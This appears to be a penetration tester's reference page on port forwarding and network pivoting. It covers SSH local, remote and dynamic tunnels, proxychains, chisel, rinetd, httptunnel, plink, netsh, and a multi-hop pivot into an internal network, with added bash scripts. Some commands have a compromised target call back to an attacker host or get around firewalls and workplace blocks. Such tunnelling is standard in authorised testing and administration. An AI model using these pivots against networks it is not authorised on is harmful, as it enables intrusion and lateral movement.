Port Forwarding and Tunneling
In computer networking, port forwarding or port mapping is an application of network address translation that redirects a communication request from one address and port number combination to another.
Reverse SSH port forwarding specifies that the given port on the remote server host is to be forwarded to the given host and port on the local side.
-L is a local tunnel (YOU --> CLIENT): the listening port is opened on your side and every connection to it comes out of the SSH server. The syntax is -L local_port:target_host:target_port. If a site is blocked where you are, you can forward the traffic through a server you own and view it from there. For example, if test was blocked at work, you could run the next command. Going to localhost:9000 on your machine will then load test through your other server.
-R is a remote tunnel (YOU <-- CLIENT): the listening port is opened on the SSH server and every connection to it comes back out of your side, so you expose something of yours for others to reach. The syntax is -R remote_port:local_host:local_port, the example above in reverse. Sometimes the SSH service on the target is down or filtered and you need to SSH back from the target to your attacking machine in order to forward a port. Note that sshd binds the -R port to loopback unless GatewayPorts is enabled in sshd_config.
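The two forwards above as an added, runnable example (not code from the original page): each tunnel is started in the background with a control socket, the local port is checked before use, and the tunnel is closed through the socket. PIVOT, the user pentester and the target 10.0.0.20 are placeholders.

```shell
#!/usr/bin/env bash
# Added example, not from the original page: start an ssh -L or -R forward
# in the background with a control socket, confirm the port came up, and
# tear it down cleanly. "PIVOT", the user "pentester" and 10.0.0.20 are
# placeholders.

# Local forward: we listen on 127.0.0.1:LPORT, the pivot connects to
# TARGET:TPORT for every connection that arrives there.
local_forward_cmd() {   # local_forward_cmd LPORT TARGET TPORT USER@PIVOT
    printf 'ssh -f -N -M -S /tmp/tun-%s -L 127.0.0.1:%s:%s:%s %s' \
        "$1" "$1" "$2" "$3" "$4"
}

# Remote forward: the pivot listens on RPORT and hands each connection back
# to LHOST:LPORT on our side. sshd binds it to loopback unless GatewayPorts
# is enabled in sshd_config.
remote_forward_cmd() {  # remote_forward_cmd RPORT LHOST LPORT USER@PIVOT
    printf 'ssh -f -N -M -S /tmp/tun-%s -R %s:%s:%s %s' \
        "$1" "$1" "$2" "$3" "$4"
}

# Wait up to TIMEOUT seconds for HOST:PORT to accept a TCP connection, using
# bash's /dev/tcp so nothing beyond the shell is needed. 0 means open.
wait_for_port() {       # wait_for_port HOST PORT TIMEOUT
    local host=$1 port=$2 deadline
    deadline=$(( $(date +%s) + $3 ))
    while [ "$(date +%s)" -lt "$deadline" ]; do
        if (exec 3<>"/dev/tcp/$host/$port") 2>/dev/null; then
            return 0
        fi
        sleep 1
    done
    return 1
}

# Close a tunnel started with -M -S through its control socket.
stop_tunnel() {         # stop_tunnel PORT USER@PIVOT
    ssh -S "/tmp/tun-$1" -O exit "$2"
}

if [ "${1:-}" = run ]; then
    # Blocked-site case from the text: localhost:9000 -> 10.0.0.20:80 via PIVOT
    eval "$(local_forward_cmd 9000 10.0.0.20 80 pentester@PIVOT)"
    wait_for_port 127.0.0.1 9000 10 || { echo "tunnel never came up" >&2; exit 1; }
    curl -s -o /dev/null -w '%{http_code}\n' http://127.0.0.1:9000/
    stop_tunnel 9000 pentester@PIVOT
    # Reverse: our local listener on 4444 becomes the pivot's 127.0.0.1:4444
    eval "$(remote_forward_cmd 4444 127.0.0.1 4444 pentester@PIVOT)"
fi
```

Run it as `bash tunnel.sh run` on the attacking machine. The -f -N pair backgrounds ssh without running a remote command; the -M -S control socket is what lets the script stop the exact tunnel it started instead of hunting for the process.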
Dynamic port forwarding (-D) is the coolest one because it creates a SOCKS proxy (OpenSSH answers both SOCKS4 and SOCKS5 on that port) and redirects all traffic sent through the proxy to the target network, which is similar to launching our scripts from the target machine.
First we need to configure proxychains: its configuration file (/etc/proxychains4.conf for proxychains-ng, /etc/proxychains.conf for the original) must list the SOCKS port we are about to open, for example socks4 127.0.0.1 9050 under [ProxyList].
Create the dynamic tunnel with the specified port.
After that, every command that begins with proxychains will be sent through the proxy. Only TCP connect() calls are proxied, so tools must use full TCP connects (for example nmap -sT -Pn); SYN scans, ICMP and UDP bypass the tunnel.
Note that -D takes no destination host: ssh only needs an SSH service on the pivot, and the destination of each connection is chosen by the SOCKS client. So even if there is no SSH service on the final target machine we can still reach it through the tunnel.
If it is not possible to set up a TTY, because the target machine does not have Python installed, we would not be able to type the password at the prompt. Instead we will use a key pair and authenticate non-interactively.
Remember to add the id_rsa.pub key to the authorized_keys file of the user you log in as, and keep the private key at mode 600 or ssh will refuse to use it.
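The dynamic tunnel, the proxychains configuration and the key-based login without a TTY, as one added example (not the page's own code). PIVOT, the user pentester, the SOCKS port 1080 and the scan target are placeholders; an ed25519 key is used instead of the id_rsa named above.

```shell
#!/usr/bin/env bash
# Added example, not from the original page: set up a SOCKS pivot with
# ssh -D, point proxychains at it, and log in with a key instead of a
# password so it works without a TTY. PIVOT and "pentester" are placeholders.

# Write a proxychains config that sends everything through the local SOCKS
# port; strict_chain + proxy_dns keep name lookups off our own resolver.
write_proxychains_conf() {   # write_proxychains_conf FILE PORT
    cat > "$1" <<EOF
strict_chain
proxy_dns
tcp_read_time_out 15000
tcp_connect_time_out 8000
[ProxyList]
socks4 127.0.0.1 $2
EOF
}

# Append a public key to an authorized_keys file only if it is not already
# there, and fix the permissions sshd insists on (~/.ssh itself must be 700).
# Prints how many times the key is present afterwards (1 when correct).
install_pubkey() {            # install_pubkey PUBKEY_FILE AUTHORIZED_KEYS
    local key
    key=$(cat "$1")
    touch "$2" && chmod 600 "$2"
    if ! grep -qxF -- "$key" "$2"; then
        printf '%s\n' "$key" >> "$2"
    fi
    grep -cxF -- "$key" "$2"
}

if [ "${1:-}" = run ]; then
    # 1. key pair with an empty passphrase, so ssh never needs a prompt
    ssh-keygen -t ed25519 -N '' -f ./pivot_key
    # 2. on the pivot (copy the .pub over first):
    #    install_pubkey pivot_key.pub ~/.ssh/authorized_keys
    # 3. dynamic tunnel: no remote command (-N), background (-f), SOCKS on 1080;
    #    BatchMode makes ssh fail instead of prompting when the key is rejected
    ssh -i ./pivot_key -o BatchMode=yes -o StrictHostKeyChecking=accept-new \
        -f -N -D 127.0.0.1:1080 pentester@PIVOT
    # 4. tools now run "from" the pivot's network; -sT -Pn because only TCP
    #    connects travel through SOCKS
    write_proxychains_conf ./proxychains.conf 1080
    proxychains4 -f ./proxychains.conf nmap -sT -Pn -p 22,80,445 10.0.0.20
fi
```

Using -f with proxychains keeps the SOCKS port out of the system-wide config, which matters when several tunnels on different ports are open at once.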
Chisel is a fast TCP/UDP tunnel, transported over HTTP, secured via SSH. Single executable including both client and server. Written in Go (golang). Chisel is mainly useful for passing through firewalls, though it can also be used to provide a secure endpoint into your network. Available on Windows and Linux
Note: Download a Release
Start the Chisel server on your attacker machine specifying the port to use. Add --reverse if the client will ask for R: remotes, and --auth user:pass so that nobody else who finds the port can use the tunnel.
On the target machine start the Chisel client, specifying the server IP and port and the ports to tunnel.
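A reverse SOCKS pivot with chisel, as an added example that is not from the page or the chisel project. The server and client flags (-p, --reverse, --auth) and the R:port:socks and R:lport:host:port remote syntax are chisel's own; ATTACKER, the ports and the credentials are placeholders.

```shell
#!/usr/bin/env bash
# Added example, not from the original page or the chisel project: a reverse
# SOCKS pivot over HTTP for a target that can reach us but that we cannot
# SSH into. ATTACKER (our IP), port 8000 and the credentials are placeholders.

# Build a reverse remote "R:LPORT:RHOST:RPORT" (the target's view of
# RHOST:RPORT appears on our 127.0.0.1:LPORT) after checking both ports,
# because a malformed remote only shows up as a client-side error later.
chisel_reverse_remote() {   # chisel_reverse_remote LPORT RHOST RPORT
    local p
    for p in "$1" "$3"; do
        case $p in
            ''|*[!0-9]*) echo "bad port: $p" >&2; return 1 ;;
        esac
        if [ "$p" -lt 1 ] || [ "$p" -gt 65535 ]; then
            echo "bad port: $p" >&2; return 1
        fi
    done
    printf 'R:%s:%s:%s' "$1" "$2" "$3"
}

case "${1:-}" in
    server)   # on the attacker
        # --reverse lets clients open R: remotes on our side; --auth keeps
        # anyone else who finds port 8000 out of the tunnel.
        ./chisel server -p 8000 --reverse --auth pentester:s3cret ;;
    client)   # on the target
        # Reverse SOCKS on our 1080, plus one reverse port so the target's
        # view of 10.0.0.20:445 becomes our 127.0.0.1:4445. Back on the
        # attacker, proxychains pointing at 127.0.0.1:1080 now works exactly
        # as with ssh -D.
        ./chisel client --auth pentester:s3cret ATTACKER:8000 \
            R:1080:socks "$(chisel_reverse_remote 4445 10.0.0.20 445)" ;;
esac
```

Run `bash chisel-pivot.sh server` on the attacking machine and `bash chisel-pivot.sh client` on the target. Because the client only makes outbound HTTP to port 8000, this survives firewalls that block inbound SSH to the target.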
rinetd is a port forwarding tool that is easy to install and configure. Its configuration file, /etc/rinetd.conf, lists all forwarding rules, one per line as bindaddress bindport connectaddress connectport. Remember to restart the service after editing it.
hts is the httptunnel server, which is easy to install. Its use is similar to rinetd, but the configuration is given as command-line parameters, and the matching htc client is run on the other end.
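The rinetd and httptunnel setups above as one added example (not the page's own code). The rule format and the hts/htc -F option are the tools' own; PIVOT, pentester, 10.0.0.20 and the port numbers are placeholders, and the service name rinetd assumes the distribution package.

```shell
#!/usr/bin/env bash
# Added example, not from the original page: manage rinetd rules from a
# script and show the httptunnel equivalent. Placeholders: the pivot listens
# on 0.0.0.0:8080 and relays to 10.0.0.20:80; hts on 8888 relays to sshd.

# Append a rule "bindaddr bindport connectaddr connectport" to a rinetd
# config unless an identical rule already exists. Prints how many times the
# rule is present afterwards (1 when correct).
add_rinetd_rule() {   # add_rinetd_rule CONF BINDADDR BINDPORT CONNECTADDR CONNECTPORT
    local rule="$2 $3 $4 $5"
    touch "$1"
    grep -qxF -- "$rule" "$1" || printf '%s\n' "$rule" >> "$1"
    grep -cxF -- "$rule" "$1"
}

# List the ports rinetd will listen on, skipping comments, blank lines and
# directives such as allow/deny/logfile (which do not have four fields).
rinetd_listen_ports() {   # rinetd_listen_ports CONF
    awk '!/^[[:space:]]*#/ && NF == 4 && $2 ~ /^[0-9]+$/ { print $2 }' "$1"
}

case "${1:-}" in
    pivot)
        add_rinetd_rule /etc/rinetd.conf 0.0.0.0 8080 10.0.0.20 80 >/dev/null
        echo "listening on: $(rinetd_listen_ports /etc/rinetd.conf | tr '\n' ' ')"
        systemctl restart rinetd      # or: service rinetd restart
        # httptunnel equivalent: hts accepts HTTP on 8888 and relays each
        # tunnel into the pivot's own sshd.
        hts -F localhost:22 8888 ;;
    attacker)
        # htc turns our local 2222 into the far end of that HTTP tunnel.
        htc -F 2222 PIVOT:8888
        ssh -p 2222 pentester@localhost ;;
esac
```

rinetd relays plain TCP, so whatever it forwards is as visible on the wire as before; httptunnel wraps the stream in HTTP, which is what gets it through proxies that only allow web traffic.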
Plink is a Windows command-line port forwarding tool from the PuTTY project. Like SSH it has local, remote and dynamic port forwarding (-L, -R, -D).
Warning: in a reverse shell the command may hang, because plink waits for the host key to be accepted and there is no interactive prompt to answer it, so pipe the answer in:
cmd.exe /c echo y | plink.exe -ssh .....
The netsh utility is installed by default on every modern version of Windows; its interface portproxy context (add v4tov4) forwards a listening port to another address and port, and relies on the IP Helper service being running.
By default, the Windows Firewall will block our connections; as administrator we can easily add a rule with netsh advfirewall firewall add rule to let the traffic pass.
Sometimes in an internal penetration test we find the following scenario, where we need to reach a network NET3.
Kali has access to NET1.
SRV1 has access to NET2.
SRV2 has access to NET3.
We can reach NET2 by creating a dynamic SSH tunnel (SOCKS) from a host on NET1 that has access to NET2, such as SRV1. SRV1 does not have access to NET3.
To reach NET3 we need a dynamic SSH tunnel to SRV2, which we cannot reach directly from Kali.
Create a port forwarding from Kali to SRV1 that redirects the SSH port of SRV2 to a local port such as 9998.
And finally create the dynamic SSH tunnel to SRV2 through that local port.
The final diagram shows what we have done with the tunnels.
To forward only one port we can chain two local port forwardings instead.
Now port 9999 of Kali is port 80 of SRV3, a host on NET3.
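The pivot chain above, generalised to any number of pivots, as an added example (not the page's own commands): each hop opens a local port that leads to the next pivot's SSH port, and the last hop carries either the SOCKS proxy or the single -L forward. It assumes every pivot runs sshd on 22 and the same user (pentester, a placeholder) logs in everywhere; SRV1, SRV2 and SRV3 are the hosts from the text.

```shell
#!/usr/bin/env bash
# Added example, not from the original page: generate the chained ssh
# commands for an arbitrary number of pivots, generalising the
# Kali -> SRV1 -> SRV2 case. Assumes every pivot runs sshd on 22 and the
# same user logs in everywhere; host names are placeholders.

# Print one ssh command per hop. Hop 1 is reached directly; hop i+1 is
# reached through the local port opened by hop i. Hop i opens
# 127.0.0.1:(BASEPORT+i-1) leading to the next pivot's port 22.
ssh_chain() {   # ssh_chain USER BASEPORT HOST1 HOST2 ... HOSTn
    local user=$1 port=$2; shift 2
    local prev_port="" host next
    while [ $# -gt 1 ]; do
        host=$1 next=$2; shift
        if [ -z "$prev_port" ]; then
            printf 'ssh -f -N -L 127.0.0.1:%s:%s:22 %s@%s\n' \
                "$port" "$next" "$user" "$host"
        else
            # HostKeyAlias records the key under the real host name instead
            # of [127.0.0.1]:port, so hops do not collide in known_hosts.
            printf 'ssh -f -N -p %s -o HostKeyAlias=%s -L 127.0.0.1:%s:%s:22 %s@127.0.0.1\n' \
                "$prev_port" "$host" "$port" "$next" "$user"
        fi
        prev_port=$port; port=$((port + 1))
    done
}

# Where the final hop logs in: straight to HOST1 when there is a single
# pivot, otherwise to the local port that reaches the last pivot's sshd.
last_hop_target() {   # last_hop_target USER BASEPORT HOST1 ... HOSTn
    local user=$1 base=$2; shift 2
    local n=$# last
    for last; do :; done
    if [ "$n" -eq 1 ]; then
        printf '%s@%s' "$user" "$last"
    else
        printf '%s' "-p $((base + n - 2)) -o HostKeyAlias=$last $user@127.0.0.1"
    fi
}

# Final hop as a SOCKS proxy on the last pivot (the NET3 case in the text).
chain_socks() {   # chain_socks USER BASEPORT SOCKSPORT HOST1 ... HOSTn
    local user=$1 base=$2 socks=$3; shift 3
    printf 'ssh -f -N -D 127.0.0.1:%s %s\n' "$socks" "$(last_hop_target "$user" "$base" "$@")"
}

# Final hop as a single port (the "double local port forwarding" case).
chain_port() {    # chain_port USER BASEPORT LPORT TARGET TPORT HOST1 ... HOSTn
    local user=$1 base=$2 lport=$3 target=$4 tport=$5; shift 5
    printf 'ssh -f -N -L 127.0.0.1:%s:%s:%s %s\n' "$lport" "$target" "$tport" \
        "$(last_hop_target "$user" "$base" "$@")"
}

if [ "${1:-}" = show ]; then
    ssh_chain pentester 9998 SRV1 SRV2            # Kali:9998 -> SRV2:22 via SRV1
    chain_socks pentester 9998 1080 SRV1 SRV2     # SOCKS on Kali:1080 inside NET3
    chain_port pentester 9998 9999 SRV3 80 SRV1 SRV2   # Kali:9999 -> SRV3:80
fi
```

Run the printed commands in order (the first hop's port must be listening before the next hop uses it) and close them in reverse order. On OpenSSH 7.3 or later the same chain collapses into one command with ProxyJump, for example ssh -J pentester@SRV1 -D 1080 pentester@SRV2, which requires AllowTcpForwarding to be enabled on the jump host's sshd.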